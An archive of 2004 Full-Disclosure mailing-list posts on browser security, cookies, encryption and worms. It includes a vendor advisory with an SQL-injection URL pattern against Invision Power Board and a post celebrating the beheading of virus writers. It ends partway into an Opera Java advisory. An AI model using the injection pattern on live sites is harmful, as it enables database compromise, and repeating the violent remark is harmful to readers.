[Full-Disclosure] Time Expiry Alogorithm??
Hi List, I was just wondering is there any encrytpion alogortim which expires with time. For example an email message maybe decrypted withing 48 hours of its delivery otherwise it become usless or cant be decrypted with the orignal key Gautam -- Gautam R. Singh http://gautam.techwhack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Gmail anomaly
--- Micheal Espinola Jr [EMAIL PROTECTED] wrote: Yep, something is awry with Firefox's cookie management. it pisses me off. I disconnect from a site (close the browser), but the next time I open FF, all my cookies are acting as if they are still live. The Maxthon add-on for IE does the same thing Its annoying as hell when you are testing web apps. Firefox's cookie manager that comes with a default installation isn't the best (I'm only talking about the GUI.) Use the CookieCuller enhanced cookie manager extension instead http://mozdev.sweetooth.org/cookieculler/ It allows you to protect/unprotect individual cookies so that when you hit Remove All Cookies only the ones you want (autologins etc) are kept, the rest are deleted. It also has the exceptions list. If you have any Firefox cookie problems after this... wait a minute... you *won't* have any problems with Firefox's cookie management after this. It's not awry as you say as I've *never* had any problems with cookies in Firefox. Regards Steve ___ Moving house? Beach bar in Thailand? New Wardrobe? Win £10k with Yahoo! Mail to make your dream a reality. Get Yahoo! Mail www.yahoo.co.uk/10k ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
Hello, Danny! This makes sense now, thanks Raoul! One more question: to make things more secure, do you have any tips on what settings to change in the firefox.js file? It's contains a lot of info. :) Very usable references here: http://thegoldenear.org/toolbox/windows/docs/mozilla-pre-config.html http://flii.us/myworks/phoenix/pages/user.html http://www.guether.de/links/moz-mods.html (in German) We have settings listed below. Not for FF but for Mozilla Seamonkey because we use scheme described above about year in our company :) But FF generally has same settings, if no, anybody might correct me. - default\prefs\browser-prefs.js - pref(wallet.crypto,true); // Encrypt saved passwords by default pref(wallet.crypto.autocompleteoverride, true); // Ignore 'autocomplete=off' at web pages pref(update_notifications.enabled, false); // Turn off autoupdate: this is unusable for R/O share pref(privacy.popups.first_popup, false); // Turn off popup blocker welcome message - greprefs\all.js - pref(dom.disable_window_open_feature.status, true); pref(dom.disable_window_status_change, true); // Make status bar always visible and disable status spoofing pref(dom.disable_window_open_feature.titlebar, true); pref(dom.disable_window_open_feature.close, true); pref(dom.disable_window_open_feature.minimizable, true); // Prevent javascripts from disable titlebar, close and minimize buttons pref(dom.disable_open_during_load, true); // Turn popup blocker on pref(network.image.imageBehavior, 1); // Load images from originating server only, // redices net traffic and privacy leaks pref(network.proxy.autoconfig_url, http://myproxy/autocfg.script;); // Enter URL of your proxy autoconfig here (if present) // OR // If you want to set up proxy manually, enter values below: pref(network.proxy.type, 1); pref(network.proxy.ftp, myproxy_dns_or_ip); pref(network.proxy.ftp_port, myproxy_port); pref(network.proxy.gopher, myproxy_dns_or_ip); pref(network.proxy.gopher_port, myproxy_port); pref(network.proxy.http, myproxy_dns_or_ip); pref(network.proxy.http_port, myproxy_port); pref(network.proxy.ssl, myproxy_dns_or_ip); pref(network.proxy.ssl_port, myproxy_port); pref(network.proxy.no_proxies_on, your intranet servers list here); pref(network.cookie.cookieBehavior, 1); // Accept cookies from originating server only, redices privacy leaks -- Best regards, Raoul Nakhmanson-Kulish Elfor Soft Ltd., ERP Department http://www.elforsoft.ru/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: [Full-Dev-Server] Time Expiry Alogorithm??
interesting question presumably there would have to be a time stamp as part of the sig which if it was too old then the message would get discarded you would have to hash the time as otherwise it would be open to spoofing think kerberos has this facitlity but it tends to be **MUCH** tighter (matter of mins by default to allow for slew) and is used to stop replay attacks [EMAIL PROTECTED] wrote on 19/11/2004 07:39:19: Hi List, I was just wondering is there any encrytpion alogortim which expires with time. For example an email message maybe decrypted withing 48 hours of its delivery otherwise it become usless or cant be decrypted with the orignal key Gautam -- Gautam R. Singh http://gautam.techwhack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Sober.I worm is here
Hello, Looks like new Sober.I worm is set to cause a medium sized epidemic, AV firms are starting to send out warnings to their public mailing lists now. It would be way cool if Mr. Zarkawi has beheaded all the VXers for breaking the muslim holy day of Friday. I would be dancing in the streets. Regards, Tamas Feher. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Time Expiry Alogorithm??
not that kerberos is of use for your application however i did find this http://www.theregister.co.uk/2003/10/22/microsoft_launches_selfdestructing_email_false/ slightly heavy handedly there is this http://www.mailexpire.com/ there's this which claims to use openpgp but which is online http://www.selfdestructing.com/selfdestructing/notary.asp and this http://www.smarterweb.co.uk/solutions/mailcertify/Self.cfm and there is further discussion here http://lists.virus.org/cryptography-0409/msg00129.html i've no doubt that searching www.counterpane.com will also shed more light on this [EMAIL PROTECTED] wrote on 19/11/2004 07:39:19: Hi List, I was just wondering is there any encrytpion alogortim which expires with time. For example an email message maybe decrypted withing 48 hours of its delivery otherwise it become usless or cant be decrypted with the orignal key Gautam -- Gautam R. Singh http://gautam.techwhack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Gmail anomaly
I agree - the default cookie manager leaves much to be desired. I've found a very useful extension called CookieCuller that handles them much better, allowing you to save or clear cookies with a single click. Plus, you can view the information contained in the cookie without having to do anything special. It's so simple, yet so powerful when used properly. I haven't had any more problems with FireFox and cookies after I started using it (back with FireFox 0.9.x) Check it out here: - http://mozdev.sweetooth.org/cookieculler/ HTH. It certainly did the trick for me. -- Peace. ~G On Fri, 19 Nov 2004 00:10:33 -0500, Micheal Espinola Jr [EMAIL PROTECTED] wrote: Yep, something is awry with Firefox's cookie management. it pisses me off. I disconnect from a site (close the browser), but the next time I open FF, all my cookies are acting as if they are still live. The Maxthon add-on for IE does the same thing Its annoying as hell when you are testing web apps. On Thu, 18 Nov 2004 16:33:07 -0800, ifconfig_xl0 [EMAIL PROTECTED] wrote: This is not a security risk but a weirdness worth noting. I reported it as a bug to gmail but im not sure if its a bug on their part it may be firefox not doing something right. If you open two gmail accounts in two different firebird/fox browsers the first account logged into after a refresh becomes the second acccount. Or if you send an e-mail with the second account, it may send as the first and refresh back as account1. So if you login with GmailAccount1 and then open another browser and log into GA2, go back to GA1 browser and hit refresh, GA1 will be in the mailbox of GA2. This obviously is not a security risk because the mailbox was already logged into, but I still thought it was a weird thing to do. It doesnt act that way with internet exploder though so it must be something with Firefox ... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ME2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
Hello, Esmond! Offline folders work as well as roaming profiles do : nice fast networks and low overhead/beefy servers work well, odd things happen if you have impatient users with laptops, wireless etc. Sometimes its simply easier to have a scheduled task sync files to a local folder. This will also address the central-server-share-Firefox I/O bottleneck you will see with medium size offices. Agreed, in large or slow networks this would be a better solution. You will lose the turnkey application security the original poster sought. I don't guess this to be a problem. If user haven't an administrative rights, he/she couldn't edit a FF files copied from server. Anyway, we are solving a problem of fool-tolerant network in this topic, not about internal wrongdoers, is it? ;) In IE, you can combat this using a configuration script in place of the proxy server (and preferredly in a public location) and outside of GP. Mozilla/Firefox understands autoconfig scripts too. The script hardcodes the proxy based on certain criteria (e.g. if local ip is your corporate addressing - use internal proxy otherwise use none). Autoconfig script may enumerate hosts which don't require a proxy. Usually there are a very few intranet servers in corporate network. More, I consider IE feature to ignore proxy for LAN hosts may be dangerous. Imagine a worm which spreads by this algorithm: it launches HTTP service on victim host, lures user at another PC to open URL pointing to victim, then launches on target PC. The fact as previosly affected host is situated in Local intranet zone, significantly facilitates worm spreading. Proxy servers are increasingly used to clean/protect IE users. This is irrelevant of browser's vendor. Good proxy always is the best addition to a good browser :) -- Best regards, Raoul Nakhmanson-Kulish Elfor Soft Ltd., ERP Department http://www.elforsoft.ru/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Gmail anomaly
Micheal, you can use the Web Developer Extension to delete domain cookies whenever you want. Paulo Pereira quote who=Micheal Espinola Jr Yep, something is awry with Firefox's cookie management. it pisses me off. I disconnect from a site (close the browser), but the next time I open FF, all my cookies are acting as if they are still live. The Maxthon add-on for IE does the same thing Its annoying as hell when you are testing web apps. On Thu, 18 Nov 2004 16:33:07 -0800, ifconfig_xl0 [EMAIL PROTECTED] wrote: This is not a security risk but a weirdness worth noting. I reported it as a bug to gmail but im not sure if its a bug on their part it may be firefox not doing something right. If you open two gmail accounts in two different firebird/fox browsers the first account logged into after a refresh becomes the second acccount. Or if you send an e-mail with the second account, it may send as the first and refresh back as account1. So if you login with GmailAccount1 and then open another browser and log into GA2, go back to GA1 browser and hit refresh, GA1 will be in the mailbox of GA2. This obviously is not a security risk because the mailbox was already logged into, but I still thought it was a weird thing to do. It doesnt act that way with internet exploder though so it must be something with Firefox ... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ME2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Paulo Jorge Pereira IP Network Engineering, CCIE 6372 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Could you please define integrated? English isn't my primary language... Integrated is similar to saying is part of or united. For future reference (and more info), Google can also be extremely handy in such a case. Doing a Google search for: :-D Thanks. I thought that it had more meanings :-D Given that Firefox is integrated in Linux... ¿Will I be able to use Linux wthout Firefox? Or, ¿is Firefox an operating system module? Being Linux a kernel... Is Firefox a kernel module? :-D (That was the whole point, I didn't mark the sarcasm correctly, though). Borja. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (Darwin) iD8DBQFBne29ULpVo4XWgJ8RAk6RAKC3Hz6S+UgXwYFStdQ+vx+UdmSrIQCgygLV g5eqzYciEFUG8h+/MtLm9Go= =ZaI2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Gmail anomaly
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 GuidoZ schrieb: I agree - the default cookie manager leaves much to be desired. I've found a very useful extension called CookieCuller that handles them [...] On Fri, 19 Nov 2004 00:10:33 -0500, Micheal Espinola Jr [EMAIL PROTECTED] wrote: Yep, something is awry with Firefox's cookie management. it pisses me off. I disconnect from a site (close the browser), but the next time I open FF, all my cookies are acting as if they are still live. the Remember Cookies: Until FF is closed (or whatever it's called) does not work? then file a bug, please. FF = 1.0pre is/was working here... - -- BOFH excuse #61: not approved by the FCC -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.5 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFBnf6fC/PVm5+NVoYRAvRWAJ4sR5svtUdWtE8YzFFKQx85qG81mwCg2qox Dt+Ss0rcYBNLu0je9W7FVac= =vaD5 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] SecurityForest - Public Release #1
Community Website: http://www.securityforest.comCommunity IRC channel: irc://irc.unixgods.net:/securityforest Table of contents= Summary The Open Source Idea Tree's in the Forest ExploitTree ToolTree TutorialTree LinkTree GreenHouse Thanks Summary===SecurityForest.com is a collaboratively edited Forest consisting of Trees which anyone can contribute to. SecurityForest's trees are specific security repositories that are categorized for practical reasons. The technologies currently in use in these repositories are based on Wiki technology and CVS (Concurrent Versioning System) technology. Depending on the species of the tree - the suitable technology will be used. SecurityForest.com is a collection of repositories (trees) for the community - by the community. In other words - the updating, modifying and improving can be done by anyone in the community.This public release is posted at http://www.securityforest.com/wiki/index.php?title=SecurityForest_-_Public_Release_no.1 The Open Source IdeaThe basic idea behind Open Source is very simple: When people can read, modify and improve a piece of software, the software evolves. People improve it, people adapt it, people fix bugs. And this can happen at a speed that, if one is used to the slow pace of conventional development, seems astonishing.We at SecurityForest have learned that this rapid evolutionary process produces better results than the traditional closed model, in which only very few people improve the Security Repositories and everybody else must use what these individuals have come across and added. SecurityForest is not only based on OpenSource software, but itself is opensource meaning the updating, modifying and improving can be done by anyone in the community. Tree's in the Forest ExploitTree---ExploitTree's ambition is to obtain a categorized collection of ALL available exploit code and therefore to become the most organized, rich and up-to-date exploit repository on the internet. The ExploitTree is based on CVS (Concurrent Versioning System) and therefore allows the user to keep an up-to-date offline mirror of the repository on their hard drive. When a user updates their local copy with a new/updated exploit, it is requested that they update the repository and give back to the community. Furthermore, a web interface for web browsing is available. ToolTreeThe ToolTree is made up of various Penetration and Security Tools. The branches are categorized according to the Hacking Defined Methodology and each tool in the Tree has a description, homepage link, download link and OS support. Tools are easy to find for a specific situation and so the massive amount of tools available on the internet used to their full potential. TutorialTreeThe TutorialTree (soon to be EducationTree) is a collection of articles and tutorials to educate in the different fields of security. Currently in Beta stage. LinkTreeThe LinkTree is a repository of hyperlinks to useful websites which are currently categorized into the following:* Security Sites* Consulting Companies* Education Companies* Miscellaneous GreenHouse==The greenhouse is an idea that evolved to allow anyone who has an idea to use the GreenHouse as a framework for it to grow with the help of the community into one of SecurityForest's trees. The life cycle of a Tree in the SecurityForest is as follows:Seed GreenHouse ForestAnyone who has an idea for a tree is welcome to propose it by "Planting a Seed". Anyone who can back up a Seed with content and maintain it can plant it in the GreenHouse. once a GreenHouse Tree is mature enough it will made an official tree and be planted in the forest. Currently, the GreenHouse is home to PasswordTree which consistes of Default Passwords but is soon to grow other password branches. Thanks==Many thanks goes out to ports, Physaro, Tal.z, Devicez, Anthrax and all the other members for their ongoing support in the forest. EOF Best Regards, Loni [EMAIL PROTECTED]
[Full-Disclosure] [MaxPatrol] SQL-injection in Invision Power Board 2.x
[ SQL-injection in Invision Power Board 2.x ] MaxPatrol Security Advisory 11.18.04 November 18, 2004 Release Date: November 18, 2004 Date Reported:November 12, 2004 Severity: High Application: Invision Power Board v2.x Affects versions: IPB 2.0.0, IPB 2.0.1 and IPB 2.0.2. Platform: PHP I. DESCRIPTION An input validation vulnerability was reported in Invision Power Board v2.x. A remote user can conduct SQL injection attack. Example: http://site/forum/index.php?act=PostCODE=02f=2t=1qpid=1[sql_injection] Result: -- mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN ibf_topics t ON (t.tid=p.topic_id) WHERE pid IN (1[sql_injection]) mySQL error: You have an error in your SQL syntax near '[sql_injection])' at line 2 mySQL error code: Date: Friday 12th of November 2004 06:53:25 PM -- This vulnerability found automatically by full-featured commercial version of MaxPatrol. II. IMPACT A remote user may be able to execute arbitrary SQL commands on the underlying database. III. SOLUTION To update your IPB 2.x board, simply download security update file, expand and upload sources/post.php over the one on your installation. IV. VENDOR FIX/RESPONSE Vulnerability is fixed. Security update: http://forums.invisionpower.com/index.php?showtopic=154916 http://forums.invisionpower.com/index.php?act=Attachtype=postid=4992 V. CREDIT This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com) - intellectual professional security scanner. It is able to detect a substantial amount of vulnerabilities not published yet. MaxPatrol's intelligent algorithms are also capable to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP Response splitting). ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
In my opinion, there are two defintions for integrated. For most people, it means a works with b. For Microsoft, it means a can not work without b. Firefox is definitelyl the former because I use it both under Linux and under Windows, and I'm trying to get it to work on my Zaurus. On Fri, 19 Nov 2004 13:57:31 +0100, Borja Marcos [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Could you please define integrated? English isn't my primary language... Integrated is similar to saying is part of or united. For future reference (and more info), Google can also be extremely handy in such a case. Doing a Google search for: :-D Thanks. I thought that it had more meanings :-D Given that Firefox is integrated in Linux... ¿Will I be able to use Linux wthout Firefox? Or, ¿is Firefox an operating system module? Being Linux a kernel... Is Firefox a kernel module? :-D (That was the whole point, I didn't mark the sarcasm correctly, though). Borja. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (Darwin) iD8DBQFBne29ULpVo4XWgJ8RAk6RAKC3Hz6S+UgXwYFStdQ+vx+UdmSrIQCgygLV g5eqzYciEFUG8h+/MtLm9Go= =ZaI2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Gmail anomaly
Thanks, will do! On Fri, 19 Nov 2004 10:43:06 +, GuidoZ [EMAIL PROTECTED] wrote: I agree - the default cookie manager leaves much to be desired. I've found a very useful extension called CookieCuller that handles them much better, allowing you to save or clear cookies with a single click. Plus, you can view the information contained in the cookie without having to do anything special. It's so simple, yet so powerful when used properly. I haven't had any more problems with FireFox and cookies after I started using it (back with FireFox 0.9.x) Check it out here: - http://mozdev.sweetooth.org/cookieculler/ HTH. It certainly did the trick for me. -- Peace. ~G On Fri, 19 Nov 2004 00:10:33 -0500, Micheal Espinola Jr [EMAIL PROTECTED] wrote: Yep, something is awry with Firefox's cookie management. it pisses me off. I disconnect from a site (close the browser), but the next time I open FF, all my cookies are acting as if they are still live. The Maxthon add-on for IE does the same thing Its annoying as hell when you are testing web apps. On Thu, 18 Nov 2004 16:33:07 -0800, ifconfig_xl0 [EMAIL PROTECTED] wrote: This is not a security risk but a weirdness worth noting. I reported it as a bug to gmail but im not sure if its a bug on their part it may be firefox not doing something right. If you open two gmail accounts in two different firebird/fox browsers the first account logged into after a refresh becomes the second acccount. Or if you send an e-mail with the second account, it may send as the first and refresh back as account1. So if you login with GmailAccount1 and then open another browser and log into GA2, go back to GA1 browser and hit refresh, GA1 will be in the mailbox of GA2. This obviously is not a security risk because the mailbox was already logged into, but I still thought it was a weird thing to do. It doesnt act that way with internet exploder though so it must be something with Firefox ... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ME2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ME2 http://www.santeriasys.net/rss.php ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Sober.I worm is here
can you define medium sized epidemic? Any new features / functionality? -KF [EMAIL PROTECTED] wrote: Hello, Looks like new Sober.I worm is set to cause a medium sized epidemic, AV firms are starting to send out warnings to their public mailing lists now. It would be way cool if Mr. Zarkawi has beheaded all the VXers for breaking the muslim holy day of Friday. I would be dancing in the streets. Regards, Tamas Feher. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Autoconfig script may enumerate hosts which don't require a proxy. Usually there are a very few intranet servers in corporate network. You should have prefixed there are very few... with one of two things 1. Relative to the internet... 2. In my experience... I have been on several large corporate networks where there are hundreds or thousands of intranet web servers hosting tens of thousands of sites. Many large enterprise class companies are moving whole hog to web based apps internally (even email) and all available content is on the internal web. This is actually the area where IE is so strongly embedded due to its application interfaces and what MS has been building towards for so long with it. If you look at this space and compare how firefox renders/operates next to IE you will see why many companies chose IE as their official browser even in the face of having more exposure due to security. A lot of that depends on how the web site is designed/built but there is a lot of functionality there that can only be reached (and thereby exploited) on IE. There are companies whose primary LOB applications internally are on IIS servers and can only be accessed with IE. In those cases it isn't a simple pick up and replace the browser scenario. More, I consider IE feature to ignore proxy for LAN hosts may be dangerous. Imagine a worm which spreads by this algorithm: it launches HTTP service on victim host, lures user at another PC to open URL pointing to victim, then launches on target PC. The fact as previosly affected host is situated in Local intranet zone, significantly facilitates worm spreading. I wouldn't really call that a worm. Worms work without interaction. They are self-propagating/replicating. Malware that spreads that requires user interaction would generally just be called a virus. Overall trying to push intranet users accessing intranet content through a proxy to sanitize web pages would be unsatisfactory because it couldn't fully be enforced since the content is available right there on the intranet. Someone could do some form of offline gather or use many different tools to get the data so forcing firefox or IE to go to a specific proxy does nothing for you. You would have to put the intranet servers behind some sort of firewall that you would have to access them though. Plus you obviously have to scale the proxy to a completely different level if processing all intranet requests as well as internet requests. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Raoul Nakhmanson-Kulish Sent: Friday, November 19, 2004 5:01 AM To: Esmond; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox Hello, Esmond! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
--On Thursday, November 18, 2004 09:32:27 AM -0600 Paul Schmehl [EMAIL PROTECTED] wrote: --On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark [EMAIL PROTECTED] wrote: Could also be RF interference. One of my coworkers tracked down a particularly interesting problem with motion sensor lights. Turns out the motion sensors worked at the 240mhz range, which has resonance at 2.4ghz, or something like that. Hence every time the motion sensor worked, it would spew what the wardriving (site survey) apps thought was a zillion different access points with widely varying MAC addresses. I would have though it was a FAKEAP program also. I would assume the same could happen with other interference. Having a common SSID would seem to indicate this is not the problem, but just thought I'd mention it. Thanks for a particularly interesting and potentially useful bit of information, Mark. After forwarding this to our wireless expert, he responded with this (which he has authorized me to forward to the list.) I find it hard to believe that this is possible. 2.4Ghz is the 9th harmonic. By the time you get to the 4th harmonic of a signal, even in very very noisy radiators, the strength of the harmonic component of the signal is extremely minute. And, given the fact that one of those sensors (which most likely does *not* truly operate in the 240MHz portion of the spectrum) will have a very low output (Part 15 device), the 10th harmonic of that signal will be undetectible as it will be at or below the level of background noise. Finally, if a device managed to get past all of the improbabilities above, the chances of it *accidentally* creating a signal that looked like an 802.11 beacon packet, complete with preamble, header, etc is so off the charts as to be laughable. One other thing... If that device truly was operating at 240MHz, then the first harmonic would be 480MHz. I'm pretty sure that frequency lies in the public service bands (ie fire/police). If not, its very close. Given that and the fact that the first harmonic would be much stronger than the 9th harmonic, I'm pretty sure someone in those bands would have complained loudly to the FCC as they don't take intereference issues in those bands lightly. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, 19 Nov 2004 13:57:31 +0100, Borja Marcos said: Given that Firefox is integrated in Linux... ¿Will I be able to use Linux wthout Firefox? Or, ¿is Firefox an operating system module? Being Hint: Linux is over 10 years old, and FireFox just came out. What did Linux do before FF 1.0 shipped? ;) Linux integration: Tools register themselves as optional add-ons to add new or extended functionality. If the tool isn't there, all that happens is the menu items *for that added function* end up greyed out or don't show up, or simply Nothing Interesting Happens when you click on the object. Microsoft integration: You remove the application that plays MPEG movies from a system that has never needed to play MPEG movies, and never will need to - and your system won't boot anymore. pgplIRuHwNcon.pgp Description: PGP signature
RE: [Full-Disclosure] IE is just as safe as FireFox
Georgi, you obviously aren't in touch with the real world if you don't realize which OS and browser comprise a vast majority of the market. That penetration often dictates for many IT professionals which OS they will be working on if they actually choose to work in the field. When you specify our in this way, you are specifying a very small minority. As someone else mentioned, I believe on this list, they had the option of working on MS products and making money (that is what companies are in business for BTW) or working on non-MS products and fighting with other suppliers over a small market and probably not making any money. As much as I hate car analogies Instead of jumping to a car that runs on hydrogen because it is safer and better for the environment and bitching at all of the gas stations that don't sell hydrogen I would rather just stick with a gasoline vehicle until the hydrogen infrastructure is able to support a large number of hydrogen vehicles. If I need to drive from Tennesee to Florida I need to drive, I don't need to spend the time whining and complaining and trying to find places that can make it so I can actually do what I need to do. If I have a hydrogen tank by home though, that is perfect for driving around there as long as it handles everything else I need in that space. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: Georgi Guninski [mailto:[EMAIL PROTECTED] Sent: Thursday, November 18, 2004 3:55 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE is just as safe as FireFox On Wed, Nov 17, 2004 at 09:22:33PM -0500, joe wrote: Pro-Choice Let me choose if I even want a browser loaded thanks! what the fuck is this? we can chose such things on our os, who must let you choose? -- where do you want bill gates to go today? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
This message is primarily destined to all MS trolls, no matter their levels, and i can see so many in this list that i am happy to target a large audience. Please run some unix or at least read about the unix permission system, and lets pray god this sheds some light in your mono cultured brains. Here are the relevant points: 1) Despite recent ameliorations of MS ( multi user finally, permissions ... ) and some effort at making the system more secure, something very important is still left out: The first default user of the MS computer is made an administrator. This comes down to giving uid0 to ur first unix user. Unix does NOT do that. It requieres you to use su and become root ( administrator ) after proper credentials submission ( password ). The first user is NOT and administrator, and any recent Unix documentation will insist on the danger of running as root(admin). Unix keeps the admin account well separated from the user account, which MS DOESN'T, despite all wrong arguments i read on this list. VERY BAD practice generally. So its user friendly, as the user has admin rights and can therefore install and remove software and change major configuration. Majority of users don't and will never know there is an 'administrator' user that hides from their eyes. This little detail that apparently Ms people can't 'understand' is a huge step. Please install a proper unix, create 2 accounts and try to read the home directory of the second user from the first. 2) After all, they don;t need to know . You're on a need to know basis job Do MS really think the users are stupid ? Do understanding different IDs/ roles / accounts on a computer that much of a tough message to pass to the end user ? Isn't security important and supposedly the goal of recent MS developpements ? If they really did target security, their efforts will have been into making the user understand that he should be admin to install programs, and a non priviledged user to surf the web. IS that that hard to understand ? And that much hidden into high IT security professionnal unreachable knowledge ? I don;t think so. Doesn't a company such as MS has enough ressources to make that a priority and educate the users ? Off course it has. Just not very 'commercially' friendly as if user then understand roles, it might requires less Anti virus, personnal firewall and other bullshit FUD's scareware ( Yes its scareware, and it is the best selling software category OF ALL times of software history ). This is why, Firefox being independant from this OS that carries 60 of its code base as being legacy code for older system hardware and backward compatibility, is likely more secure than the in house integrated application. Now if u are running Firefox as an administrator .don't be surprised if something happens. Don;t blame the software, but your poor security practices. Lets not hide from ourselves whats needed from MS to reach modern world security: a complete rewrite, and a ditch of old Dos base and the 20 years old legacy code. Hopes that clears things. Rafel Ivgi, The-Insider wrote: Firefox is not intgrated to the OS, because it doesn't have an OS. Its just a trimmed Mozilla for windows.. However Mozilla in Linux is integrated at some level...so they are just the same as I.E. Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: john morris [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, November 14, 2004 3:34 PM Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Firefox avoids several fundamental design flaws of IE, in that: -Firefox is not integrated into Windows, and thus closes holes allowing access to the OS. -Firefox does not support ActiveX JavaVM or VBScript, three Microsoft proprietary technologies that are responsible for many security holes. -Firefox does not allow for the invasion of your system by adware and spyware just by visiting a website. (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html --- This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, Nov 19, 2004 at 10:51:43AM -0500, joe wrote: Autoconfig script may enumerate hosts which don't require a proxy. Usually there are a very few intranet servers in corporate network. You should have prefixed there are very few... with one of two things 1. Relative to the internet... 2. In my experience... Well, he did say usually :) This is actually the area where IE is so strongly embedded due to its application interfaces and what MS has been building towards for so long with it. If you look at this space and compare how firefox renders/operates next to IE you will see why many companies chose IE as their official browser even in the face of having more exposure due to security. A lot of that depends on how the web site is designed/built but there is a lot of functionality there that can only be reached (and thereby exploited) on IE. There are companies whose primary LOB applications internally are on IIS servers and can only be accessed with IE. In those cases it isn't a simple pick up and replace the browser scenario. Even something as simple as OWA (Outlook Web Access), which is often used as the main component of the corporate Extranet is strikingly different. OWA looks like an average web app when viewed on a Mozilla or similar browser. OWA looks almost exactly like Outlook when viewed by IE. Other apps flatly refuse to work with anything but IE. None of these are strictly web applications anymore - they are applications that use an UI processor, which happens to be the HTML processor as well. -- Vincent ARCHER [EMAIL PROTECTED] Tel : +33 (0)1 40 07 47 14 Fax : +33 (0)1 40 07 47 27 Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Java Vulnerabilities in Opera 7.54
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Illegalaccess.org Advisory: Opera 7.54 Java vulnerabilities
Author: Marc Schönefeld, www.illegalaccess.org
Summary
Opera 7.54 is vulnerable to leakage of the java sandbox, allowing malicious
applets to gain unacceptable privileges. This allows them to be used for
